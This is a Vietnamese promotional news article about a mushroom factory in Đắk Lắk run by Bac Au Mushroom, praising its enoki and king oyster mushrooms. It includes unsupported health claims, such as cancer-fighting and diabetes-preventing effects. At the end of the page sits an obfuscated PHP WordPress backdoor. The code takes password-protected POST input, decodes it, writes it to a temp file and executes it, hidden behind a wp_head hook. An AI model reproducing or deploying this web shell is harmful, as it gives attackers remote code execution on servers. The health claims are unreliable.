Năng suất tối đa nhà máy nấm ở Đắk Lắk vẫn không đủ hàng bán

Nội dung chính

Mặc dù năng suất đã được nâng lên đến mức tối đa nhưng nhà máy nấm ở Đắk Lắk của Công ty CP Thực phẩm Công nghệ cao Bắc Âu vẫn “cháy” hàng.

Không những “cháy” hàng mà điện thoại của nhân viên chăm sóc khách hàng tại nhà máy sản xuất nấm ở Đắk Lắk này (đặt tại lô C 28-30 Khu công nghiệp Hòa Phúc, TP Buôn Ma Thuột) cũng “cháy” luôn, rồi cả các kênh mạng xã hội.

Từ sau khi báo Tuổi Trẻ đăng loạt bài phóng sự điều tra phanh phui nấm dỏm “đội lốt” nấm chuẩn VietGAP vào các kệ hàng, thì uy tín của những nhà máy nấm “make 100% by Vietnam” như của Công ty Thực phẩm Công nghệ cao Bắc Âu (Bac Au Mushroom), càng được giới mua bán cực kỳ chú ý.

Thời gian này, nhà máy sản xuất nấm ở Đắk Lắk của Bac Au Mushroom tập trung nuôi trồng và sản xuất chủ yếu nấm Kim châm và nấm Đùi gà, 2 loại nấm rất được ưa chuộng tại thị trường Việt Nam. Sản phẩm đạt chứng nhận sản phẩm hữu cơ Việt Nam (VCO), Thực phẩm an toàn VietGAP (19.3341-HC6/VC) được cấp bởi các tổ chức uy tín.

Bên cạnh đó, nhà máy đang được tập trung đầu tư thêm để mở rộng quy mô sản xuất, tăng năng suất, nhằm đáp ứng nhu cầu ngày càng cao của thị trường.

Sản xuất nấm Kim châm

Theo một nghiên cứu của Đại học Quốc gia Singapore (2005), trong nấm Kim châm có chứa nhiều protein giúp tăng cường khả năng miễn dịch; lại chứa nhiều chất xơ, protein, các vitamin B6, B3, B9… không chỉ giúp bổ sung chất nguồn dinh dưỡng cho cơ thể mà còn bảo vệ hệ tiêu hóa…

Việc nuôi trồng và sản xuất nấm kim châm cần rất nhiều dinh dưỡng, nguyên liệu thô chiếm 35%, 65% còn lại là các loại tinh chất như khô đậu tương, cám mạch, cám gạo, cám ngô, bã củ cải đường.

Nấm Kim châm sống ở nhiệt độ 5-16 độ C nên nhà máy nấm phải đầu tư các phòng lạnh hoàn toàn; đảm bảo không hóa chất, không bổ sung thành phần vi lượng và không chất bảo quản.

Sản xuất Nấm Đùi gà 

Nấm Đùi gà chứa hàm lượng protein trong nấm cao gấp 3-6 lần so với với các loại rau thông thường và nhiều loại acid amin, vitamin thiết yếu giúp cải thiện sức khỏe, nâng cao sức đề kháng cho người dùng. 

Đặc biệt, chất Polysaccharide trong nấm Đùi gà có hoạt tính chống ung thư rất hiệu quả. Ngoài ra nấm Đùi gà còn có tác dụng trong việc phòng trừ bệnh tiểu đường, tốt cho hệ tiêu hóa.

Nấm Đùi gà là thực phẩm ưa lạnh cho nên việc Bac Au Mushroom sản xuất trong các phòng lạnh tiêu chuẩn của nhà máy ở Đắk Lắk là rất hợp lý, kỹ thuật trồng khá đơn giản, dễ chăm sóc mà giá trị thương phẩm rất cao, có thể trồng quanh năm. 

Trong kỹ thuật trồng nấm đùi gà chọn nguyên liệu rất quan trọng vì ảnh hưởng trực tiếp đến chất lượng sản phẩm.

Nguyên liệu chính để trồng nấm Đùi gà là mùn cưa nhưng không được để bị mốc, chưa dùng đến phải phơi khô, bảo quản cẩn thận. Thứ hai là bông sợi phế loại, không ẩm mốc, không mục nát. Cuối cùng là cám gạo, bột ngô sạch không lẫn tạp chất, không mốc hỏng.

Với tình hình năng lực sản xuất của các nhà máy nấm trong nước đang còn rất hạn chế so với nhu cầu tiêu thụ, người tiêu dùng cần lựa chọn những sản phẩm uy tín như Bac Au Mushroom trước khi mua. 

T.Anh

Thấy hay thì Share bạn nhé:

Facebook
Twitter
LinkedIn

Các bài viết khác

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}